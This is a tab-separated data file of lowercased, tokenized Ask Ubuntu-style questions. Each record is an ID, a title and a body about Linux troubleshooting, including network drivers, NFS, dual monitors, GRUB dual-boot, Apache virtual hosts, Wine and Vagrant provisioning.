470656	how to recover asix ax88179 from backports installation	i recently installed https : //www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.13.2/backports-3.13.2-1.tar.gz with make defconfig-wifi & & make & & sudo make install ( `` successfully '' ) and uninstalled it with sudo make uninstall because it removed my built-in wlan interface as well . before this i installed driver from asix ax88179 ( version 1.9.0 ) with make & & sudo make install & & sudo update-initramfs -u -k all which worked multiple times before ( both installation and usage of the adapter ) . when i install the asix driver again ( both version 1.9.0 and 1.10.0 from from http : //www.asix.com.tw/products.php ? op=pitemdetail & pitemid=131 ; 71 ; 112 & pline=71 ) with the commands mentioned above the interface is listed in output of lsusb , but sudo ifconfig eth1 192.168.4.102 ( which worked before ) returns siocsifaddr : no such device eth1 : error while getting interface flags : no such device . i 'm using linux richter-lenovo-ideapad-z500 3.13.11-03131102-generic # 201405081435 smp thu may 8 18:36:07 utc 2014 x86_64 x86_64 x86_64 gnu/linux ( installed from http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.13.11.2-trusty/ [ 1 ] ) . /var/log/syslog says [ 8.549220 ] rts5139 : module is from the staging directory , the quality is unknown , you have been warned . [ 8.549540 ] ax88179_178a : disagrees about version of symbol usbnet_write_cmd [ 8.549544 ] ax88179_178a : unknown symbol usbnet_write_cmd ( err -22 ) [ 8.549576 ] ax88179_178a : disagrees about version of symbol usbnet_write_cmd_async [ 8.549578 ] ax88179_178a : unknown symbol usbnet_write_cmd_async ( err -22 ) [ 8.549611 ] ax88179_178a : disagrees about version of symbol usbnet_skb_return [ 8.549613 ] ax88179_178a : unknown symbol usbnet_skb_return ( err -22 ) [ 8.549619 ] ax88179_178a : disagrees about version of symbol usbnet_read_cmd [ 8.549621 ] ax88179_178a : unknown symbol usbnet_read_cmd ( err -22 ) [ 8.549625 ] ax88179_178a : disagrees about version of symbol usbnet_write_cmd_nopm [ 8.549627 ] ax88179_178a : unknown symbol usbnet_write_cmd_nopm ( err -22 ) [ 8.549650 ] ax88179_178a : disagrees about version of symbol usbnet_read_cmd_nopm [ 8.549658 ] ax88179_178a : unknown symbol usbnet_read_cmd_nopm ( err -22 ) [ 8.549786 ] ax88179_178a : disagrees about version of symbol usbnet_get_endpoints [ 8.549788 ] ax88179_178a : unknown symbol usbnet_get_endpoints ( err -22 ) [ 8.549827 ] ax88179_178a : disagrees about version of symbol usbnet_defer_kevent [ 8.549828 ] ax88179_178a : unknown symbol usbnet_defer_kevent ( err -22 ) [ 8.552744 ] usbcore : registered new interface driver btusb what could that mean and how do i get around this to a working interface ? [ 1 ] using this version is necessary because of system freeze with the default ubuntu image , investigating and solving this issues makes sense , of course , but i 'd be glad if i can keep this workaround for instance
470658	live ubuntu server install on usb	i just got a server with no hdd 's and want to run ubuntu server until my ssd arrives . how would i create a persistent live ubuntu server usb without installing it from another cd/usb ?
470660	i am having problems setting up nfs	i have tried to follow the tutorial/how to here https : //help.ubuntu.com/community/settingupnfshowto # installation_and_configuration i have installed nfs-kernel-server on the server machine and added the following to /etc/exports on the server ; /home 192.168.0.0/255.255.255.0 ( rw , sync , no_subtree_check ) i have installed nfs-common on the client . i have added the directory servershare under /home . when i run sudo mount 192.168.1.12 : /home /home/servershare i get mount.nfs : access denied by server while mounting 192.168.1.12 : /home i have also tried ; added the client username as a user on the server with permissions to the adm and server group added the line âall zach @ 192.168.1.10â to the hosts.allow file found nothing in the hosts.deny file disabled ufw and rebooted the server edited to omit narrative
470664	clean install not saving wifi key , mismatching connection types ( wired for wifi )	i have a recent clean install that is not saving my wifi security key . i have never physically connected an ethernet cable , but it is saying i have used a wired connection . what problem could be the cause of these symptoms ? output of lspci : sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices , inc. [ amd ] family 12h/14h processor function 7 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 07:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie
470666	unity 14.04 - left click to raise window with focus-follows-mouse	after upgrading to 14.04 , right-clicking on the titlebar no longer raises the window . i use focus-follows-mouse and historically use the titlebar to promote windows to the foreground . is there a way to change this behavior ? i 've looked in dconf-editor , compiz settings manager , and unity tweak tool , but do n't see anything .
470669	uk macintosh usb keyboard mapping incorrect after 14.04 update . how can i fix it ?	after updating to 14.04 , my keyboard layout is n't quite right . i 'm using a wired usb macintosh keyboard with uk keys . it used to be ok before the update , i even blogged about the need to select `` english ( uk , macintosh ) '' . now the problem seems to be that the §/± key is swapped with the `/~ ( backtick/tilde ) . there may be others i have n't noticed yet . @ , £ and $ all seem fine . none of the uk presets work for me , any ideas of the cause/solution ?
470672	can not configure dual screen on a lenovo w530 with optimus on 14.04	i have managed to install the nvidia-331-updates drivers on my lenovo w530 , and if i start nvidia-settings , it says : ** message : prime : requires offloading ** message : prime : is it supported ? yes which is great . furthermore , my xrandr setup seems just fine : # xrandr screen 0 : minimum 8 x 8 , current 3600 x 1080 , maximum 16384 x 16384 vga-0 disconnected primary ( normal left inverted right x axis y axis ) lvds-0 disconnected ( normal left inverted right x axis y axis ) dp-0 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 478mm x 300mm panning 3600x1080+0+0 1680x1050 60.0*+ 1600x900 60.0 1280x1024 75.0 60.0 1280x800 74.9 59.8 1152x720 60.0 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 dp-1 disconnected ( normal left inverted right x axis y axis ) dp-2 disconnected ( normal left inverted right x axis y axis ) dp-3 disconnected ( normal left inverted right x axis y axis ) dp-4 disconnected ( normal left inverted right x axis y axis ) dp-5 disconnected ( normal left inverted right x axis y axis ) lvds-1-0 connected 1920x1080+0+0 344mm x 193mm 1920x1080 60.0*+ 59.9 50.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 60.0 960x720 60.0 928x696 60.1 896x672 60.0 960x600 60.0 960x540 60.0 800x600 60.0 60.3 56.2 840x525 60.0 59.9 800x512 60.2 700x525 60.0 640x512 60.0 720x450 59.9 640x480 60.0 59.9 680x384 59.8 60.0 576x432 60.1 512x384 60.0 400x300 60.3 56.3 320x240 60.1 vga-1-0 disconnected 1680x1050 ( 0x48 ) 146.2mhz h : width 1680 start 1784 end 1960 total 2240 skew 0 clock 65.3khz v : height 1050 start 1053 end 1059 total 1089 clock 60.0hz 1280x1024 ( 0x4c ) 108.0mhz h : width 1280 start 1328 end 1440 total 1688 skew 0 clock 64.0khz v : height 1024 start 1025 end 1028 total 1066 clock 60.0hz 1024x768 ( 0x53 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x5a ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 640x480 ( 0x63 ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz the contents of xorg.conf are as they should be : # cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' busid `` pci:0 @ 0:2:0 '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:1 @ 0:0:0 '' option `` constraincursor '' `` off '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` allowemptyinitialconfiguration '' `` on '' endsection but when i run nvidia-settings , it simply clones the screen , and will not let me modify the setting . i want to extend across to the secondary screen when it is plugged into the display port . edit : when i run the following command : # xrandr -- output lvds-1-0 -- auto -- output dp-0 -- mode 1680x1050 -- right-of lvds-1-0 -- verbose it says : crtc 0 : 1680x1050 60.0 +1920+0 `` dp-0 '' crtc 4 : 1920x1080 60.0 +0+0 `` lvds-1-0 '' and the following is appended to xorg.0.log : [ 121.934 ] ( ii ) nvidia ( gpu-0 ) : display ( benq bl2201 ( dfp-1 ) ) does not support nvidia 3d [ 121.934 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 121.965 ] ( ii ) nvidia ( gpu-0 ) : display ( benq bl2201 ( dfp-1 ) ) does not support nvidia 3d [ 121.965 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 121.965 ] ( ii ) modesetting ( g0 ) : edid vendor `` len '' , prod id 16562 [ 121.965 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 121.965 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x0.0 139.00 1920 1980 2028 2050 1080 1090 1100 1130 -hsync -vsync ( 67.8 khz ep ) [ 121.965 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x0.0 115.83 1920 1980 2028 2050 1080 1090 1100 1130 -hsync -vsync ( 56.5 khz e ) [ 121.996 ] reporting 7 10 51 392 [ 122.018 ] ( ii ) nvidia ( 0 ) : setting mode `` dp-0 : nvidia-auto-select @ 1680x1080 +1920+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 122.101 ] ( ii ) nvidia ( 0 ) : setting mode `` dp-0 : nvidia-auto-select @ 3600x1080 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 122.184 ] reporting 7 10 51 392 [ 122.192 ] reporting 7 10 51 392 [ 122.209 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.212 ] reporting 7 10 51 392 [ 122.212 ] reporting 7 10 51 392 it looks like it is setting the dp-0 ( external ) screen to a very large display , with the same origin ( so cloned )
470673	shortcuts stopped to work	i have ubuntu 13.10 . 2 hours ago i installed latest updated . ( all remember about update is that it was 13mb size ) and rebooted . now my shortcuts do not work as expected . first , i was switching language with alt+space . alt+space is still selected in all settings - text entry but when i press it i get top right windows menu like on windows . i was not getting it few hours ago . then sublime text 2 ctrl+dot , ctrl+p works like i just press ctrl+p . seems like it is the only way to get package installer . may be ctrl+dot is hooked by os and sublime text 2 is not getting that input . any idea what could happen with shortcuts and how can i roll back to old behavior ? update i went throw all settings - keyboard and found that alt space activates windows menu . i disabled it . but ctrl dot or ctrl . is not listed there .
470674	system profiler gives incorrect cpu speed ?	when i check the system profiler and benchmark application it gives me incorrect cpu speeds and the speeds tend to vary every time i run the application . ranging from 1900 to 3900 ( 3900mhz is what i would expect it to say every time ) . what do these values indicate ? was i wrong to expect the maximum speed ?
470675	connect to only one specific wireless network if available ?	i have a home server running xubuntu 12.10 and it is connected by wlan to my home network . the problem is that when the router crashes , the server loses connection and tries to connect to another network . my neighbours have open wireless connections and i 'm afraid that my server might connect to their networks . i want to make the server to connect to my home network , when it 's available , and when not , just to wait for it to become available . if i need to explain this scenario more or to answer further questions , do not hesitate to ask .
470676	why is n't apache satisfied with the first entry in /etc/hosts ?	i have /etc/apache2 mutex file : $ { apache_lock_dir } default pidfile $ { apache_pid_file } timeout 300 keepalive on maxkeepaliverequests 100 keepalivetimeout 5 user $ { apache_run_user } group $ { apache_run_group } hostnamelookups off errorlog $ { apache_log_dir } /error.log loglevel warn includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf include ports.conf < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > accessfilename .htaccess < filesmatch `` ^\.ht '' > require all denied < /filesmatch > logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent includeoptional conf-enabled/*.conf includeoptional sites-enabled/*.conf /etc/apache2/sites-enabled/000-default.conf < virtualhost *:80 > servername richter-local.de serveradmin webmaster @ localhost documentroot /var/www/ errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > /etc/apache2/sites-enabled/mediawiki.conf < virtualhost *:80 > documentroot /var/www/mediawiki servername richter-local.de < /virtualhost > and /etc/hosts 127.0.0.1 localhost richter-local.de 127.0.1.1 richter-lenovo-ideapad-z500 richter-local.de : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters 192.168.4.102 richter-local.de 192.168.178.62 richter-local.de 141.20.195.79 richter-local.de 192.168.4.101 richter-synology.de ifconfig shows eth0 link encap : ethernet hardware adresse 20:89:84:86:6d:4f inet adresse:192.168.4.102 bcast:192.168.4.255 maske:255.255.255.0 inet6-adresse : fe80 : :2289:84ff : fe86:6d4f/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:101131 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:111821 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:89237563 ( 89.2 mb ) tx-bytes:123567962 ( 123.5 mb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:5882 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:5882 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:1411819 ( 1.4 mb ) tx-bytes:1411819 ( 1.4 mb ) virbr0 link encap : ethernet hardware adresse ea : b9:6b : fe : d3 : dd inet adresse:192.168.122.1 bcast:192.168.122.255 maske:255.255.255.0 up broadcast multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:0 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hardware adresse 68:17:29:77:05:42 inet adresse:192.168.178.62 bcast:192.168.178.255 maske:255.255.255.0 inet6-adresse : fe80 : :6a17:29ff : fe77:542/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:79163 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:109596 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:15962887 ( 15.9 mb ) tx-bytes:108352352 ( 108.3 mb ) why does the request of http : //richter-local.de/mediawiki redirect to http : //richter-synology.de/mediawiki/index.php/hauptseite ? ? this also happens if i comment out the last line 192.168.4.101 richter-synology.de in /etc/hosts .
470680	problem configuring dns on ubuntu server running as a virtual machine	i am running `` ubuntu-14.04-server-amd64 '' server as a virtual machine via virtual box on my mac osx 10.9.x . i am trying to learn how to configure dns via linux . i crawled websites for continuously for two days but no success.following are the snapshots of my work . /etc/network/interfaces looks like : ifconfig looks like : named.conf.local looks like : named.conf.options domain.com.db looks like : rev.0.168.192.in-addr.arpa looks like : resolv.conf looks like : hosts.png looks like : while testing it looks like : i do n't know whats wrong with it . please suggest me something . any help is appreciated .
470681	cloning lxc container using python3-lxc	i am experimenting with lxc on ubuntu 14.04 . in order to manage a couple of lxc instances i am using python3-lxc . using pyhthon3-lxc , i do fail to clone an existing container : > > > import lxc > > > c = lxc.container ( 'vanilla ' ) > > > c.defined true > > > c2 = c.clone ( 'vanilla_clone ' ) > > > c2.defined false correspondingly there is no rootfs for vanilla_clone in /var/lib/lxc . using $ lxc-clone vanilla vanilla_clone works fine . ( python3 and lxc-clone where both started with sudo . ) is this a bug or a limitation in python3_lxc or am i missing something ? afterthought : using lxc.container.create is requiring a template which i should not need when cloning form an existing object .
470683	edimax ew7811un only works for a short period of time	my edimax usb adapter works fine for a short period of time ( ~ 10 minutes or so ) but then just stops the internet connection . then i either have to plug it in and out or reboot my pc . that 's annoying ! i tried installing the driver from realtek with install.sh but it does n't succeed . using ubuntu 14.04 . any ideas ? thanks in advance ! christoffer
470685	windows 7 not appearing on grub2	so i just installed ubuntu 14 on a separate hard drive from windows 7 . but when grub2 boots up , i only see options to boot ubuntu , windows 7 is nowhere in sight . i 've had to manually boot the hard drive with windows 7 on it to get in . here 's my disc info : /dev/sda1 hpfs/ntfs ( windows 7 drive ) /dev/sdb1 hpfs/ntfs ( tb drive ) /dev/sdc1 efi system fat ( ubuntu drive , grub is installed on this one ) if i run sudo update-grub i get : generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic adding boot menu entry for efi firmware configuration done running sudo parted -l shows : model : ata crucial_ct240m50 ( scsi ) disk /dev/sda : 240gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 240gb 240gb primary ntfs boot model : ata wdc wd10ezrx-00a ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs model : ata wdc wd2500js-00m ( scsi ) disk /dev/sdc : 250gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 538mb 537mb fat32 boot 2 538mb 242gb 241gb ext4 3 242gb 250gb 8471mb linux-swap ( v1 ) any ideas on how to get windows 7 to appear ?
470686	ca n't lock screen through unity	i ca n't lock my screen through keyboard shortcut or dropdown menu . here 's the twist - i can lock it by running gnome-screensaver-command -l in a terminal . how do i diagnose this ?
470688	how do i configure a 32bit directory for wine in ubuntu 14.04 ?	i have been having a devil of a time trying to get wine to install .net on my 64 bit machine . the first thing i should mention is that this is a completely fresh install . the only things i have installed are wine 1.7.19 and the ms core fonts . i have also updated ubuntu , but that is literally all i have done . when installing .net 2.0 , it says that .net only works with 32 bit systems . i looked up how to fix the problem and various sources said that i should run this command . winearch=win32 wineprefix=~/.wine32 winecfg but when i do that , i get this error . p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory fixme : ntdll : ntlockfile i/o completion on lock not implemented yet err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot fixme : ntdll : ntlockfile i/o completion on lock not implemented yet err : winediag : secur32_initntlmsp ntlm_auth was not found or is outdated . make sure that ntlm_auth > = 3.0.25 is in your path . usually , you can find it in the winbind package of your distribution . fixme : iphlpapi : notifyaddrchange ( handle 0xdbe880 , overlapped 0xdbe88c ) : stub wine : configuration in '/home/athena/.wine32 ' has been updated . p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory can someone help me out please ?
470690	permission when running script in vagrant using vagrantfile	i have created a vagrant box for running rails applications and i have managed to create it manually . my next step was to create a shell script that i can include in the vagrantfile so when creating new boxes all installation will be done automatically . but when i reach the line : source ~/.bash_profile i get this error mkdir : can not create directory `/home/vagrant/.rbenv/shims ' : permission denied mkdir : can not create directory `/home/vagrant/.rbenv/versions ' : permission denied works fine from cli any ideas ? update i have fixed the mkdir error and the script runs from end to end with no apparent errors . now when i vagrant ssh and check my home directory i do not find any of the git repos i downloaded and installed using my script nor .bash_profile hence i can not rbenv any ideas why this may happen - what am i doing wrong ? vagrant @ precise64 : ~ $ ls -a . .bash_history .cache .profile .sudo_as_admin_successful .veewee_version .. .bash_logout .bashrc postinstall.sh .ssh .vbox_version vagrant @ precise64 : ~ $ this is setup.sh : # update sources : sudo apt-get -y update # install development tools : sudo apt-get -y install build-essential # packages required for compilation of some stdlib modules sudo apt-get -y install tklib # extras for rubygems and rails : sudo apt-get -y install zlib1g-dev libssl-dev # readline dev on ubuntu : sudo apt-get -y install libreadline-gplv2-dev # install some nokogiri dependencies : sudo apt-get -y install libxml2 libxml2-dev libxslt1-dev # install git sudo apt-get -y install git-core # install sqlite sudo apt-get -y install sqlite3 libsqlite3-dev # install make sudo apt-get -y install make # install nodejs ( required for rails ) sudo apt-get -y install python-software-properties sudo add-apt-repository -y ppa : chris-lea/node.js sudo apt-get -y update sudo apt-get -y install curl nodejs # install rbenv git clone https : //github.com/sstephenson/rbenv.git ~/.rbenv touch ~/.bash_profile echo 'export path= '' $ home/.rbenv/bin : $ path '' ' > > ~/.bash_profile echo 'eval `` $ ( rbenv init - ) '' ' > > ~/.bash_profile source ~/.bash_profile # install ruby 2.1.0 git clone https : //github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build sudo sh ~/.rbenv/plugins/ruby-build/install.sh rbenv install 2.1.0 rbenv rehash rbenv global 2.1.0 # install gems for rails # gem install rdoc gem install bundler # gem install rake gem install sqlite3 -v '1.3.9' gem install rails rbenv rehash many thanks in advance .
470691	how can i replace google chrome 's low resolution notification icon ?	google chrome was recently upgraded to version 35.0.1916.114 on my ubuntu 14.04 installation . since then the notification icon has begun to show up on the system tray . however it seems it 's using a low resolution icon - it looks distorted : how can i fix/replace it ?
470697	how to configure the foward/rewind step size ( in seconds ) ?	the default setting of vlc is to skip x seconds when forwarding/rewinding based on the video length ( there 's also the possibility to make small steps ( hotkey for that is configurable ) ) . how can i set the steps to be a seconds long with a depending on the video length ? can i overwrite the default forward/rewind hotkeys ( mouse wheel up/down when hovering over progress bar without pressing further keys ) to consider this setting ?
470698	how to unmount a partition before reinstallation ?	to have a fresh installation i was told i need to format the partition it is on and simply re-install ubuntu . i am currently on a live cd and was going to format it but apparently its mounted so i ca n't format it . i 'm not sure what to do and i would like ubuntu back with out screwing something up . btw i dual-booted it so i would also like to do this without screwing up the windows partition . screenshot of gparted : lspci :
470699	ubuntu 12.04 gpg error : http : //archive.ubuntu.com precise release : the following signatures were invalid : nodata 1 nodata 2	i know this is asked often but nothing seems to work for me . every time i try to update i get the following : sudo apt-get update get:1 http : //archive.ubuntu.com precise release.gpg get:2 http : //ppa.launchpad.net precise release.gpg get:3 http : //archive.ubuntu.com precise release get:4 http : //ppa.launchpad.net precise release.gpg get:5 http : //ppa.launchpad.net precise release ign http : //archive.ubuntu.com precise release e : gpg error : http : //archive.ubuntu.com precise release : the following signatures were invalid : nodata 1 nodata 2 the only way i can successfully execute sudo apt-get update is by removing all software sources ( which is pointless ) . regardless of whatever software source i use ( official ubuntu or some other ppa ) i get the same errors . so far i have tried : changing the server from main to some other . . . no joy the suggested fixes from here , here , here , and here . nothing seems to work . it seems that all my key data is missing and i ca n't figure out how to get it back . any help would be very appreciated !
470702	volume control not showing in ubuntu 14.04 unity top panel	for some reason volume control widget is not showing on my ubuntu 14.04 panel . i reinstalled alsa and something else , because my sound broke . now i ca n't get my audio control panel to display on unity main panel . any one knows what is the problem ?
470703	maximize error with chrome and blender under gnome 3	images say a 1000 words : this happens after i maximize the window , the content of the window is moved a little to the right . this only happens with chrome and blender ( did n't happen with older releases of chrome , only the newest one ) . does anyone know how to fix this ?
470707	more than 10 program icons	on the gnome shell by pressing super , on each icon some numbers appear from 0 to 9 based of the all number of icons which are located in there . so if have more that 10 icon what should i do ?
470708	how to fix symbolic links after switching from bash to zsh	i had bash as my default shell even though i was only using zsh . i always started it myself by opening the terminal and typing zsh . today i decided to use it as my default shell . so i found this link and ran the following command sudo chsh -s $ ( which zsh ) john where john is my user . it all worked fine until i tried accessing my bank 's website and noticed that the symbolic link i had created for the java chrome plugin did n't work anymore . i tried deleting it and creating a new one via zsh with this command : sudo ln -s /opt/jre1.7.0_55/lib/amd64/libnpjp2.so but it did n't work . should i do something different now that i 'm using zsh ? how do i get my symbolic links working again ?
470714	ubuntu does not enable bluetooth after suspend	my bluetooth is not recognized after sleep . probably is something related to bios but i am not 100 % sure . the output of hcitool dev shows nothing and rfkill list all only lists the wireless card . i am running on ubuntu 12.04 and i guess it is a dedicated bluetooth card and not a combo . is this something related to drivers or bios settings ? kind regards
470720	ubuntu server 14.04 quotations marks display wrong	when ever the character ' is displayed in my terminal it displays as 창. i have never had this with the previous versions of ubuntu . for example : rm : can not remove 창/etc/init.d/novnc창 : no such file or directory
470722	ubuntu 14.04 - virtual surround sound ?	when i used to use windows , i would always install razer surround . it worked wonders and i found the software amazing . now that i 've switched to ubuntu , i 've found nothing on google that is seemingly a good alternative to the previously mentioned software . does anyone here know ?
470728	about hybrid graphics amd/amd ubuntu 14.04	which one is the best way to install the fglrx driver . i installed it with the ubuntu drivers center but it make me use the integrated card ( 6520g ) instead 6470m in games so the performance is poor playing games . when i run fglrx info just show me 6520g and not the 6470m and even in amd center show me just the 6520g how can i do for use both cards like a pxp in archlinux or crossfire at windows 7
470730	can not download charm from juju-gui	trying to do a simple provisioning through juju-gui , i.e. , mysql and wordpress combo ; however , when i press the deploy button , i get the following notification : error deploying mysql could not deploy the requested service . server responded with : can not download charm `` cs : precise/mysql-44 '' : can not access the charm store . are you connected to the internet ? error details : get https : //store.juju.ubuntu.com/charm-info ? charms=cs % 3aprecise % 2fmysql-44 : dial tcp 91.189.95.66:443 : connection timed out similar message is observed , under /var/log/juju/all-machines.log : machine-0 : 2014-05-22 17:19:19 debug juju.state.apiserver apiserver.go:127 - > [ a ] user-admin 2m7.308014762s { `` requestid '' :25 , '' error '' : '' can not download charm \ '' cs : precise/mysql-44\ '' : can not access the charm store . are you connected to the internet ? error details : get https : //store.juju.ubuntu.com/charm-info ? charms=cs % 3aprecise % 2fmysql-44 : dial tcp 91.189.95.67:443 : connection timed out '' , '' response '' : { } } client [ `` '' ] .servicedeploy here is what i get from ping ubuntu @ node2 : /var/log/juju $ ping 91.189.95.67:443 ping : unknown host 91.189.95.67:443 ubuntu @ node2 : maas server has 2 nics , one public facing , and the other for maas communication . the target node has a single nic connected to maas network . ( side note - i tried experimenting with 2 nics on target node , one for outside and one for maas , by defining new gw and routing table . though the target node was able to see the outside world ; however , its communication with maas server got all messed up . so gave up on that . ) here is target node 's network setup : ubuntu @ node2 : /var/log/juju $ more /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 10.0.0.10 search maas ubuntu @ node2 : /var/log/juju $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 10-0-0-10.maas 0.0.0.0 ug 0 0 0 eth1 10.0.0.0 * 255.255.255.0 u 0 0 0 eth1 ubuntu @ node2 : /var/log/juju $ all hints are welcome .
470737	how to remove nginx and re activate apache ?	i have installed apache2 , mysql , php5 and phpmyadmin on my ubuntu 14.04 but later on mistakenly i install nginx . now my localhost page show me welcome to nginx server . and the localhost/phpmyadmin link is not working . how can i get my lamp server back ? i removed ngnix using command sudo apt-get remove nginx sudo apt-get purge nginx installing apache sudo apache2ctl restart but at the end on restarting apache2 i get this error sudo apache2ctl restart ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message httpd not running , trying to start ( 98 ) address already in use : ah00072 : make_sock : could not bind to address [ : : ] :80 ( 98 ) address already in use : ah00072 : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down ah00015 : unable to open logs action 'restart ' failed .
470741	is kali linux based on ubuntu ?	i remember reading in another thread ( is backtrack is derivative of ubuntu ? ) that kali linux is based on debian . can someone clarify ?
470748	error after installing ubuntu 14.04 with windows 7	i 've a new pc with two drives : ssd ( 120 gb ) hdd ( 1tb ) i want to use windows 7 and ubuntu in it . so first off i installed windows 7 in a partition of the ssd . windows was working perfectly . next i installed ubuntu this way : / in another partition of the ssd . swap in a partition of the hdd . /home in a partition of the hdd once installed , when rebooting i get a black screen with a horizontal stripe of green and blue dots , and the typical drum sound of the ubuntu startup playing on and on . no grub , no windows . i 've managed to get this device info with the ubuntu installation cd : /dev/sda /dev/sda1 ntfs 104mb ( the reserved windows recovery partition ) /dev/sda3 ext4 32218mb ( ubuntu 14.04 root ) /dev/sda2 ntfs 87707mb ( windows 7 ) /dev/sb /dev/sdb5 swap 8180mb /dev/sdb2 ext4 102399mb ( ubuntu /home ) unallocated space 889623mb ( future ntfs partition ) what 's been wrong and what could i do to recover my already installed oses ?
